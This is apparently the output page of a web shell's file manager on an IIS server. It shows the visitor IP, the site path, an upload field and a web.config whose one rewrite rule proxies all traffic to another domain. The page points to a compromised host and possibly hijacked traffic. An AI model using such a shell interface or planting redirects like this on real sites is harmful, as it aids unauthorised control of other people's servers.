????

Your IP : 18.191.175.60


Current Path : C:/inetpub/vhost/binhdinhf1.gdtsolutions.vn/
Upload File :
Current File : C:/inetpub/vhost/binhdinhf1.gdtsolutions.vn/web.config

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
        <rewrite>
            <rules>
                <rule name="ProxyToMocha" stopProcessing="true">
                    <match url="(.*)" />
                    <action type="Rewrite" url="https://binhdinhf1.com/{R:1}" />
                </rule>
            </rules>
        </rewrite>
    </system.webServer>
</configuration>